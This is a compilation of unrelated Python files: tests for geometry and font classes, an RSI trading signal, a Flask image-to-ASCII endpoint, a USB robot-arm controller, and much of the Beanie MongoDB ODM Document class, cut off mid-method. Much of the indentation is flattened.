assert Area(3, 5, 7, 15).is_in(Pos(3, 5)) == True
assert Area(3, 5, 7, 15).is_in(Pos(4, 6)) == True
assert Area(3, 5, 7, 15).is_in(Pos(9, 19)) == True
assert Area(3, 5, 7, 15).is_in(Pos(2, 5)) == False
assert Area(3, 5, 7, 15).is_in(Pos(3, 4)) == False
assert Area(3, 5, 7, 15).is_in(Pos(2, 4)) == False
assert Area(3, 5, 7, 15).is_in(Pos(9, 20)) == False
assert Area(3, 5, 7, 15).is_in(Pos(10, 19)) == False
assert Area(3, 5, 7, 15).is_in(Pos(10, 20)) == False
assert Area(1, 2, 3, 4) + Pos(10, 20) == Area(11, 22, 3, 4)
assert Area(1, 2, 3, 4) + Size(10, 20) == Area(1, 2, 13, 24)
assert Area(1, 2, 3, 4).to_tuple() == (1, 2, 3, 4)
assert Area(1, 2, 3, 4).to_dict() == {'x' : 1, 'y' : 2, 'width' : 3, 'height' : 4}
### Area and Range ###
assert Area(1, 2, 10, 20).to_range() == Range(1, 2, 11, 22)
assert Range(1, 2, 11, 22).to_area() == Area(1, 2, 10, 20)
### FontInfo ###
font_info = FontInfo("Courier New", 22, FontStyle.ITALIC, SizeUnit.POINT)
assert font_info.name == "Courier New"
assert font_info.size == 22
assert font_info.style == FontStyle.ITALIC
assert font_info.size_unit == SizeUnit.POINT
### FontData ###
font_data = FontData()
assert font_data.texture_data.data == b''
assert font_data.texture_data.pixel_format == PixelFormat.UNKNOWN
assert font_data.texture_data.size == Size(0, 1)
assert font_data.texture_glyph_infos == {}
assert font_data.max_glyph_height == 0
font_data = FontData(TextureData(b'abc', PixelFormat.RGBA, Size(12, 13)), {4 : (1.0, 2.0, 3.0, 4.0)}, 10)
assert font_data.texture_data.data == b'abc'
assert font_data.texture_data.pixel_format == PixelFormat.RGBA
assert font_data.texture_data.size == Size(12, 13)
assert font_data.texture_glyph_infos == {4 : (1.0, 2.0, 3.0, 4.0)}
assert font_data.max_glyph_height == 10
### FontSource ###
font_source = FontSource("a", "b", "c", "d")
assert font_source.normal_url == "a"
assert font_source.bold_url == "b"
assert font_source.italic_url == "c"
assert font_source.bold_and_italic_url == "d"
### FontSourceRegister ###
register = FontSourceRegister()
assert register.get("x", FontStyle.BOLD) == ""
register.add("x", FontSource("a", "b", "c", "d"))
register.add("y", FontSource(normal_url = "a2", bold_url = "b2", italic_url = "c2", bold_and_italic_url = "d2"))
assert register.get("x", FontStyle.BOLD) == "b"
assert register.get("y", FontStyle.NORMAL) == "a2"
assert register.get("y", FontStyle.BOLD) == "b2"
assert register.get("y", FontStyle.ITALIC) == "c2"
assert register.get("y", FontStyle.BOLD_AND_ITALIC) == "d2"
assert register.get("y", 100) == ""
### GlyphCodeBlock ###
glyph_code_block = GlyphCodeBlock(10, 20)
assert glyph_code_block.first == 10
assert glyph_code_block.last == 20
glyph_code_block_group = GlyphCodeBlockGroup(GlyphCodeBlock(10, 20)) + GlyphCodeBlockGroup(GlyphCodeBlock(21, 30), GlyphCodeBlock(31, 40))
assert glyph_code_block_group.blocks[0].first == 10
assert glyph_code_block_group.blocks[0].last == 20
assert glyph_code_block_group.blocks[1].first == 21
assert glyph_code_block_group.blocks[1].last == 30
assert glyph_code_block_group.blocks[2].first == 31
assert glyph_code_block_group.blocks[2].last == 40
if __name__ == "__main__":
run_test(test_commons)
|
import numpy as np
def rsiDBcross(rsi1, rsi2):
states = np.zeros(len(rsi2))
bought = 1
sold = 1
states[0] = 0
for i in range(len(rsi1)-1):
if(rsi2[i+1]>rsi1[i+1]):
            if (rsi2[i+1] - rsi1[i+1] > 5) & (sold == 1):
states[i+1] = 0
bought = 1
sold = 0
elif (states[i] == 0) & (rsi2[i+1] - rsi1[i+1] > 5):
states[i+1] = 0
else:
states[i+1] = 1
else:
if(rsi1[i+1] - rsi2[i+1] > 2) & (bought == 1):
states[i+1] = 2
bought = 0
sold = 1
elif (states[i] == 2) & (rsi1[i+1] - rsi2[i+1] > 5):
states[i+1] = 2
else:
states[i+1] = 1
return states
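# Hedged usage sketch (synthetic numbers, names illustrative): both inputs are
# expected to be equally long RSI series.  By the rules above, state 0 is emitted
# on the buy-side condition (rsi2 above rsi1 by more than 5 while `sold` is set),
# state 2 on the sell-side condition (rsi1 above rsi2 by more than 2 while
# `bought` is set), and state 1 otherwise.
#
#   rsi_a = np.array([40., 45., 55., 62., 70., 66., 58.])
#   rsi_b = np.array([50., 50., 51., 53., 56., 60., 61.])
#   states = rsiDBcross(rsi_a, rsi_b)    # array of 0/1/2 signals, same length as rsi_b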
|
#!/usr/bin/env python
from flask import Flask
from flask import request
import image_pb2 as impb
from PIL import Image
import io
import imutils
import cv2
app = Flask(__name__)
@app.route('/invocations', methods = ['POST'])
def index():
data = request.data
# Read the existing image.
image_packet = impb.Image()
image_packet.ParseFromString(data)
    with open('picture_out_for.jpg', 'wb') as f:
        f.write(image_packet.image_data)
    img = Image.open('picture_out_for.jpg')
# resize the image
width, height = img.size
aspect_ratio = height / width
new_width = 120
new_height = aspect_ratio * new_width * 0.55
img = img.resize((new_width, int(new_height)))
# new size of image
# print(img.size)
# convert image to greyscale format
img = img.convert('L')
pixels = img.getdata()
# replace each pixel with a character from array
chars = ["B", "S", "#", "&", "@", "$", "%", "*", "!", ":", "."]
new_pixels = [chars[pixel // 25] for pixel in pixels]
new_pixels = ''.join(new_pixels)
# split string of chars into multiple strings of length equal to new width and create a list
new_pixels_count = len(new_pixels)
ascii_image = [new_pixels[index:index + new_width] for index in range(0, new_pixels_count, new_width)]
ascii_image = "\n".join(ascii_image)
print(ascii_image)
# write to a text file.
with open("ascii_image.txt", "w") as f:
f.write(ascii_image)
f.close()
with open("ascii_image.txt", 'r') as f:
file_contents = f.read()
print(file_contents)
f.close()
return(file_contents)
if __name__ == '__main__':
app.run(debug=True)
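# Hedged client sketch (assumptions noted): /invocations expects a serialized
# image_pb2.Image whose `image_data` field carries raw JPEG bytes, which is the
# only field the handler reads.  Assuming the dev server above is reachable on
# localhost:5000 and the `requests` package is available:
#
#   import requests
#   import image_pb2 as impb
#
#   packet = impb.Image()
#   with open('picture.jpg', 'rb') as f:
#       packet.image_data = f.read()
#   resp = requests.post('http://localhost:5000/invocations',
#                        data=packet.SerializeToString())
#   print(resp.text)    # ASCII-art rendering of the posted image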
|
from macop.utils import progress
|
#import the USB and Time librarys into Python
import usb.core, usb.util, time, sys
import logging
log = logging.getLogger('hardware/owi_arm')
# led pesistence variable
led = 0
RoboArm = 0
def setup(robot_config):
#Allocate the name 'RoboArm' to the USB device
global RoboArm
RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x000)
#Check if the arm is detected and warn if not
if RoboArm is None:
log.critical("USB Arm not found")
sys.exit()
def CtrlTransfer(a, b, c, d, e, f):
global led
error = 0
while True :
try:
e[2] = led
RoboArm.ctrl_transfer(a, b, c, d, e, f)
break
except:
error += 1
log.error("USB timeout!")
time.sleep(0.1)
if error == 5:
sys.exit()
pass
#Define a procedure to execute each movement
def MoveArm(Duration, ArmCmd):
#Start the movement
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
#Stop the movement after waiting a specified duration
time.sleep(Duration)
ArmCmd=[0,0,0]
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
def move(args):
global led
command = args['command']
if command == 'L':
MoveArm(0.15, [0,2,0]) # Rotate counter-clockwise
if command == 'R':
MoveArm(0.15, [0,1,0]) # Rotate clockwise
if command == 'B':
MoveArm(0.15, [128,0,0]) # Rotate Shoulder down
if command == 'F':
MoveArm(0.15, [64,0,0]) # Rotate Shoulder up
if command == 'U':
MoveArm(0.15, [16,0,0]) # Rotate Elbow up
if command == 'D':
MoveArm(0.15, [32,0,0]) # Rotate Elbow down
if command == 'W':
MoveArm(0.15, [4,0,0]) # Rotate Wrist Up
if command == 'S':
MoveArm(0.15, [8,0,0]) # Rotate Wrist Down
if command == 'C':
MoveArm(0.15, [2,0,0]) # Open Gripper
if command == 'V':
MoveArm(0.15, [1,0,0]) # Close Gripper
    if command == '1':
        led = 1
        MoveArm(0.15, [0,0,1]) # LED On
    if command == '0':
        led = 0
        MoveArm(0.15, [0,0,0]) # LED Off
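# Hedged usage sketch: a host process is expected to call setup() once (the
# robot_config argument is accepted but unused above) and then feed
# single-letter commands to move():
#
#   setup(None)
#   move({'command': 'U'})   # elbow up for 0.15 s
#   move({'command': 'C'})   # open the gripper
#   move({'command': '1'})   # LED on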
|
import asyncio
import inspect
from typing import (
Dict,
Optional,
List,
Type,
Union,
Tuple,
Mapping,
TypeVar,
Any,
overload,
Set,
)
from typing import TYPE_CHECKING
from uuid import UUID, uuid4
from bson import ObjectId, DBRef
from motor.motor_asyncio import AsyncIOMotorDatabase, AsyncIOMotorCollection
from pydantic import (
ValidationError,
parse_obj_as,
PrivateAttr,
validator,
Field,
)
from pydantic.main import BaseModel
from pydantic.types import ClassVar
from pymongo import InsertOne
from pymongo.client_session import ClientSession
from pymongo.results import (
DeleteResult,
InsertManyResult,
)
from beanie.exceptions import (
CollectionWasNotInitialized,
ReplaceError,
DocumentNotFound,
RevisionIdWasChanged,
DocumentWasNotSaved,
NotSupported,
)
from beanie.odm.actions import EventTypes, wrap_with_actions, ActionRegistry
from beanie.odm.bulk import BulkWriter, Operation
from beanie.odm.cache import LRUCache
from beanie.odm.enums import SortDirection
from beanie.odm.fields import (
PydanticObjectId,
ExpressionField,
Link,
LinkInfo,
LinkTypes,
WriteRules,
DeleteRules,
)
from beanie.odm.interfaces.update import (
UpdateMethods,
)
from beanie.odm.models import (
InspectionResult,
InspectionStatuses,
InspectionError,
)
from beanie.odm.operators.find.comparison import In
from beanie.odm.queries.aggregation import AggregationQuery
from beanie.odm.queries.find import FindOne, FindMany
from beanie.odm.queries.update import UpdateMany
from beanie.odm.settings.general import DocumentSettings
from beanie.odm.utils.dump import get_dict
from beanie.odm.utils.relations import detect_link
from beanie.odm.utils.self_validation import validate_self_before
from beanie.odm.utils.state import saved_state_needed, save_state_after
if TYPE_CHECKING:
from pydantic.typing import AbstractSetIntStr, MappingIntStrAny, DictStrAny
DocType = TypeVar("DocType", bound="Document")
DocumentProjectionType = TypeVar("DocumentProjectionType", bound=BaseModel)
class Document(BaseModel, UpdateMethods):
"""
Document Mapping class.
Fields:
- `id` - MongoDB document ObjectID "_id" field.
Mapped to the PydanticObjectId class
Inherited from:
- Pydantic BaseModel
- [UpdateMethods](https://roman-right.github.io/beanie/api/interfaces/#aggregatemethods)
"""
id: Optional[PydanticObjectId] = None
# State
revision_id: Optional[UUID] = Field(default=None, hidden=True)
_previous_revision_id: Optional[UUID] = PrivateAttr(default=None)
_saved_state: Optional[Dict[str, Any]] = PrivateAttr(default=None)
# Relations
_link_fields: ClassVar[Optional[Dict[str, LinkInfo]]] = None
# Cache
_cache: ClassVar[Optional[LRUCache]] = None
# Settings
_document_settings: ClassVar[Optional[DocumentSettings]] = None
# Customization
# Query builders could be replaced in the inherited classes
_find_one_query_class: ClassVar[Type] = FindOne
_find_many_query_class: ClassVar[Type] = FindMany
# Other
_hidden_fields: ClassVar[Set[str]] = set()
@validator("revision_id")
def set_revision_id(cls, revision_id):
if not cls.get_settings().model_settings.use_revision:
return None
return revision_id or uuid4()
def __init__(self, *args, **kwargs):
super(Document, self).__init__(*args, **kwargs)
self.get_motor_collection()
async def _sync(self) -> None:
"""
Update local document from the database
:return: None
"""
if self.id is None:
raise ValueError("Document has no id")
new_instance: Optional[Document] = await self.get(self.id)
if new_instance is None:
raise DocumentNotFound(
"Can not sync. The document is not in the database anymore."
)
for key, value in dict(new_instance).items():
setattr(self, key, value)
if self.use_state_management():
self._save_state()
@wrap_with_actions(EventTypes.INSERT)
@save_state_after
@validate_self_before
async def insert(
self: DocType,
*,
link_rule: WriteRules = WriteRules.DO_NOTHING,
session: Optional[ClientSession] = None,
) -> DocType:
"""
Insert the document (self) to the collection
:return: Document
"""
if link_rule == WriteRules.WRITE:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.insert(link_rule=WriteRules.WRITE)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.insert(link_rule=WriteRules.WRITE)
result = await self.get_motor_collection().insert_one(
get_dict(self, to_db=True), session=session
)
new_id = result.inserted_id
if not isinstance(new_id, self.__fields__["id"].type_):
new_id = self.__fields__["id"].type_(new_id)
self.id = new_id
return self
async def create(
self: DocType,
session: Optional[ClientSession] = None,
) -> DocType:
"""
The same as self.insert()
:return: Document
"""
return await self.insert(session=session)
@classmethod
async def insert_one(
cls: Type[DocType],
document: DocType,
session: Optional[ClientSession] = None,
bulk_writer: "BulkWriter" = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> Optional[DocType]:
"""
Insert one document to the collection
:param document: Document - document to insert
:param session: ClientSession - pymongo session
:param bulk_writer: "BulkWriter" - Beanie bulk writer
        :param link_rule: InsertRules - how to manage link fields
:return: DocType
"""
if not isinstance(document, cls):
raise TypeError(
"Inserting document must be of the original document class"
)
if bulk_writer is None:
return await document.insert(link_rule=link_rule, session=session)
else:
if link_rule == WriteRules.WRITE:
raise NotSupported(
"Cascade insert with bulk writing not supported"
)
bulk_writer.add_operation(
Operation(
operation=InsertOne,
first_query=get_dict(document, to_db=True),
object_class=type(document),
)
)
return None
@classmethod
async def insert_many(
cls: Type[DocType],
documents: List[DocType],
session: Optional[ClientSession] = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> InsertManyResult:
"""
Insert many documents to the collection
:param documents: List["Document"] - documents to insert
:param session: ClientSession - pymongo session
:param link_rule: InsertRules - how to manage link fields
:return: InsertManyResult
"""
if link_rule == WriteRules.WRITE:
raise NotSupported(
"Cascade insert not supported for insert many method"
)
documents_list = [
get_dict(document, to_db=True) for document in documents
]
return await cls.get_motor_collection().insert_many(
documents_list,
session=session,
)
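    # Hedged usage sketch (the Product model is illustrative, not part of this
    # module):
    #
    #   result = await Product.insert_many([Product(name="a"), Product(name="b")])
    #   result.inserted_ids    # pymongo InsertManyResult with the new ObjectIds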
@classmethod
async def get(
cls: Type[DocType],
document_id: PydanticObjectId,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Optional[DocType]:
"""
Get document by id, returns None if document does not exist
:param document_id: PydanticObjectId - document id
:param session: Optional[ClientSession] - pymongo session
:param ignore_cache: bool - ignore cache (if it is turned on)
:return: Union["Document", None]
"""
if not isinstance(document_id, cls.__fields__["id"].type_):
document_id = parse_obj_as(cls.__fields__["id"].type_, document_id)
return await cls.find_one(
{"_id": document_id},
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
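    # Hedged usage sketch (model name and id value are illustrative):
    #
    #   product = await Product.get(PydanticObjectId("..."), ignore_cache=True)
    #   if product is None:
    #       ...  # no document with that id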
@overload
@classmethod
def find_one(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: None = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindOne[DocType]:
...
@overload
@classmethod
def find_one(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Type[DocumentProjectionType],
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindOne[DocumentProjectionType]:
...
@classmethod
def find_one(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Union[FindOne[DocType], FindOne[DocumentProjectionType]]:
"""
Find one document by criteria.
Returns [FindOne](https://roman-right.github.io/beanie/api/queries/#findone) query object.
When awaited this will either return a document or None if no document exists for the search criteria.
:param args: *Mapping[str, Any] - search criteria
:param projection_model: Optional[Type[BaseModel]] - projection model
:param session: Optional[ClientSession] - pymongo session instance
:param ignore_cache: bool
:return: [FindOne](https://roman-right.github.io/beanie/api/queries/#findone) - find query instance
"""
return cls._find_one_query_class(document_model=cls).find_one(
*args,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
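    # Hedged usage sketch (the Product model and its fields are assumptions):
    #
    #   product = await Product.find_one(Product.name == "Tony's", fetch_links=True)
    #
    # Awaiting the returned FindOne query yields the matching document or None.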
@overload
@classmethod
def find_many(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: None = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def find_many(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Type[DocumentProjectionType] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def find_many(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Optional[Type[DocumentProjectionType]] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
Find many documents by criteria.
Returns [FindMany](https://roman-right.github.io/beanie/api/queries/#findmany) query object
:param args: *Mapping[str, Any] - search criteria
:param skip: Optional[int] - The number of documents to omit.
:param limit: Optional[int] - The maximum number of results to return.
:param sort: Union[None, str, List[Tuple[str, SortDirection]]] - A key or a list of (key, direction) pairs specifying the sort order for this query.
:param projection_model: Optional[Type[BaseModel]] - projection model
:param session: Optional[ClientSession] - pymongo session
:param ignore_cache: bool
:return: [FindMany](https://roman-right.github.io/beanie/api/queries/#findmany) - query instance
"""
return cls._find_many_query_class(document_model=cls).find_many(
*args,
sort=sort,
skip=skip,
limit=limit,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
@overload
@classmethod
def find(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: None = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def find(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Type[DocumentProjectionType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def find(
cls: Type[DocType],
*args: Union[Mapping[str, Any], bool],
projection_model: Optional[Type[DocumentProjectionType]] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
fetch_links: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
The same as find_many
"""
return cls.find_many(
*args,
skip=skip,
limit=limit,
sort=sort,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
fetch_links=fetch_links,
)
@overload
@classmethod
def find_all(
cls: Type[DocType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
projection_model: None = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def find_all(
cls: Type[DocType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def find_all(
cls: Type[DocType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
Get all the documents
:param skip: Optional[int] - The number of documents to omit.
:param limit: Optional[int] - The maximum number of results to return.
:param sort: Union[None, str, List[Tuple[str, SortDirection]]] - A key or a list of (key, direction) pairs specifying the sort order for this query.
:param projection_model: Optional[Type[BaseModel]] - projection model
:param session: Optional[ClientSession] - pymongo session
:return: [FindMany](https://roman-right.github.io/beanie/api/queries/#findmany) - query instance
"""
return cls.find_many(
{},
skip=skip,
limit=limit,
sort=sort,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
)
@overload
@classmethod
def all(
cls: Type[DocType],
projection_model: None = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocType]:
...
@overload
@classmethod
def all(
cls: Type[DocType],
projection_model: Type[DocumentProjectionType],
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> FindMany[DocumentProjectionType]:
...
@classmethod
def all(
cls: Type[DocType],
projection_model: Optional[Type[DocumentProjectionType]] = None,
skip: Optional[int] = None,
limit: Optional[int] = None,
sort: Union[None, str, List[Tuple[str, SortDirection]]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> Union[FindMany[DocType], FindMany[DocumentProjectionType]]:
"""
the same as find_all
"""
return cls.find_all(
skip=skip,
limit=limit,
sort=sort,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
)
@wrap_with_actions(EventTypes.REPLACE)
@save_state_after
@validate_self_before
async def replace(
self: DocType,
ignore_revision: bool = False,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> DocType:
"""
Fully update the document in the database
:param session: Optional[ClientSession] - pymongo session.
:param ignore_revision: bool - do force replace.
Used when revision based protection is turned on.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: self
"""
if self.id is None:
raise ValueError("Document must have an id")
if bulk_writer is not None and link_rule != WriteRules.DO_NOTHING:
raise NotSupported
if link_rule == WriteRules.WRITE:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.replace(
link_rule=link_rule,
bulk_writer=bulk_writer,
ignore_revision=ignore_revision,
session=session,
)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.replace(
link_rule=link_rule,
bulk_writer=bulk_writer,
ignore_revision=ignore_revision,
session=session,
)
use_revision_id = self.get_settings().model_settings.use_revision
find_query: Dict[str, Any] = {"_id": self.id}
if use_revision_id and not ignore_revision:
find_query["revision_id"] = self._previous_revision_id
try:
await self.find_one(find_query).replace_one(
self,
session=session,
bulk_writer=bulk_writer,
)
except DocumentNotFound:
if use_revision_id and not ignore_revision:
raise RevisionIdWasChanged
else:
raise DocumentNotFound
return self
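# A minimal usage sketch (model and field names are hypothetical, not from this
# source): replace() fully overwrites the stored document and, when revisions
# are enabled, raises RevisionIdWasChanged if the stored revision_id no longer
# matches, unless ignore_revision=True is passed.
#
#   sample = await Sample.find_one(Sample.name == "old")
#   sample.name = "new"
#   await sample.replace()
#   await sample.replace(ignore_revision=True)  # skip the revision check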
async def save(
self: DocType,
session: Optional[ClientSession] = None,
link_rule: WriteRules = WriteRules.DO_NOTHING,
) -> DocType:
"""
Update an existing model in the database or insert it if it does not yet exist.
:param session: Optional[ClientSession] - pymongo session.
:return: self
"""
if link_rule == WriteRules.WRITE:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.save(
link_rule=link_rule, session=session
)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.save(
link_rule=link_rule, session=session
)
try:
return await self.replace(session=session)
except (ValueError, DocumentNotFound):
return await self.insert(session=session)
@saved_state_needed
@wrap_with_actions(EventTypes.SAVE_CHANGES)
@validate_self_before
async def save_changes(
self,
ignore_revision: bool = False,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> None:
"""
Save changes.
State management usage must be turned on
:param ignore_revision: bool - ignore revision id, if revision is turned on
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: None
"""
if not self.is_changed:
return None
changes = self.get_changes()
await self.set(
changes, # type: ignore #TODO fix typing
ignore_revision=ignore_revision,
session=session,
bulk_writer=bulk_writer,
)
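# A minimal usage sketch (model and field names are hypothetical), assuming
# use_state_management is enabled in the model settings: save_changes() sends
# only the fields reported by get_changes() as a partial update via set().
#
#   sample = await Sample.find_one(Sample.name == "x")  # state saved on parse
#   sample.count += 1
#   await sample.save_changes()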
@classmethod
async def replace_many(
cls: Type[DocType],
documents: List[DocType],
session: Optional[ClientSession] = None,
) -> None:
"""
Replace a list of documents
:param documents: List["Document"]
:param session: Optional[ClientSession] - pymongo session.
:return: None
"""
ids_list = [document.id for document in documents]
if await cls.find(In(cls.id, ids_list)).count() != len(ids_list):
raise ReplaceError(
"Some of the documents do not exist in the collection"
)
await cls.find(In(cls.id, ids_list), session=session).delete()
await cls.insert_many(documents, session=session)
@save_state_after
async def update(
self,
*args,
ignore_revision: bool = False,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> None:
"""
Partially update the document in the database
:param args: *Union[dict, Mapping] - the modifications to apply.
:param session: ClientSession - pymongo session.
:param ignore_revision: bool - force update. Will update even if the revision id does not match the stored one
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: None
"""
use_revision_id = self.get_settings().model_settings.use_revision
find_query: Dict[str, Any] = {"_id": self.id}
if use_revision_id and not ignore_revision:
find_query["revision_id"] = self._previous_revision_id
result = await self.find_one(find_query).update(
*args, session=session, bulk_writer=bulk_writer
)
if (
use_revision_id
and not ignore_revision
and result.modified_count == 0
):
raise RevisionIdWasChanged
await self._sync()
@classmethod
def update_all(
cls,
*args: Union[dict, Mapping],
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> UpdateMany:
"""
Partially update all the documents
:param args: *Union[dict, Mapping] - the modifications to apply.
:param session: ClientSession - pymongo session.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: UpdateMany query
"""
return cls.find_all().update_many(
*args, session=session, bulk_writer=bulk_writer
)
async def delete(
self,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
link_rule: DeleteRules = DeleteRules.DO_NOTHING,
) -> Optional[DeleteResult]:
"""
Delete the document
:param session: Optional[ClientSession] - pymongo session.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:param link_rule: DeleteRules - rules for link fields
:return: Optional[DeleteResult] - pymongo DeleteResult instance.
"""
if link_rule == DeleteRules.DELETE_LINKS:
link_fields = self.get_link_fields()
if link_fields is not None:
for field_info in link_fields.values():
value = getattr(self, field_info.field)
if field_info.link_type in [
LinkTypes.DIRECT,
LinkTypes.OPTIONAL_DIRECT,
]:
if isinstance(value, Document):
await value.delete(
link_rule=DeleteRules.DELETE_LINKS
)
if field_info.link_type == LinkTypes.LIST:
for obj in value:
if isinstance(obj, Document):
await obj.delete(
link_rule=DeleteRules.DELETE_LINKS
)
return await self.find_one({"_id": self.id}).delete(
session=session, bulk_writer=bulk_writer
)
@classmethod
async def delete_all(
cls,
session: Optional[ClientSession] = None,
bulk_writer: Optional[BulkWriter] = None,
) -> Optional[DeleteResult]:
"""
Delete all the documents
:param session: Optional[ClientSession] - pymongo session.
:param bulk_writer: "BulkWriter" - Beanie bulk writer
:return: Optional[DeleteResult] - pymongo DeleteResult instance.
"""
return await cls.find_all().delete(
session=session, bulk_writer=bulk_writer
)
@overload
@classmethod
def aggregate(
cls: Type[DocType],
aggregation_pipeline: list,
projection_model: None = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> AggregationQuery[Dict[str, Any]]:
...
@overload
@classmethod
def aggregate(
cls: Type[DocType],
aggregation_pipeline: list,
projection_model: Type[DocumentProjectionType],
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> AggregationQuery[DocumentProjectionType]:
...
@classmethod
def aggregate(
cls: Type[DocType],
aggregation_pipeline: list,
projection_model: Optional[Type[DocumentProjectionType]] = None,
session: Optional[ClientSession] = None,
ignore_cache: bool = False,
) -> Union[
AggregationQuery[Dict[str, Any]],
AggregationQuery[DocumentProjectionType],
]:
"""
Aggregate over collection.
Returns [AggregationQuery](https://roman-right.github.io/beanie/api/queries/#aggregationquery) query object
:param aggregation_pipeline: list - aggregation pipeline
:param projection_model: Type[BaseModel]
:param session: Optional[ClientSession]
:param ignore_cache: bool
:return: [AggregationQuery](https://roman-right.github.io/beanie/api/queries/#aggregationquery)
"""
return cls.find_all().aggregate(
